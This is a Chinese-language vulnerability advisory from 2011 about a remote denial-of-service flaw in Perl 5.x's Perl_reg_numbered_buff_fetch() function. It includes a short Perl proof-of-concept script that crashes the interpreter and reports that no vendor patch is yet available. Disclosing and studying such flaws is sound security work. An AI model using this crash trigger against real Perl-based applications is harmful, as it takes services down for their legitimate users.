发布日期：2011-03-23
更新日期：2011-03-23

受影响系统：

Larry Wall Perl 5.x

描述：

---

BUGTRAQ  ID: 47006

Perl 是一种自由且功能强大的编程语言。它被用作 Web 编程、数据库处理、XML 处理以及系统管理等等 — 它能够完成所有这些工作，同时仍然是处理小的日常工作的完美工具。

Perl "Perl_reg_numbered_buff_fetch()"函数在实现上存在远程拒绝服务漏洞，远程攻击者可利用此漏洞造成使用受影响perl代码的应用程序终止运行，拒绝服务合法用户。

<*来源：Vladimir Perepelitsa
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Vladimir Perepelitsa （）提供了如下测试方法：

#!/usr/bin/perl


my @x = ("A=B","AAAA=/");
utf8::upgrade $_ for @x;
$x[1] =~ s{/\s*$}{};
for (@x) {
m{^([^=]+?)\s*=.+$};
}

建议：

---

厂商补丁：

Larry Wall
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.perl.org/

浏览次数：2376
严重程度：0（网友投票）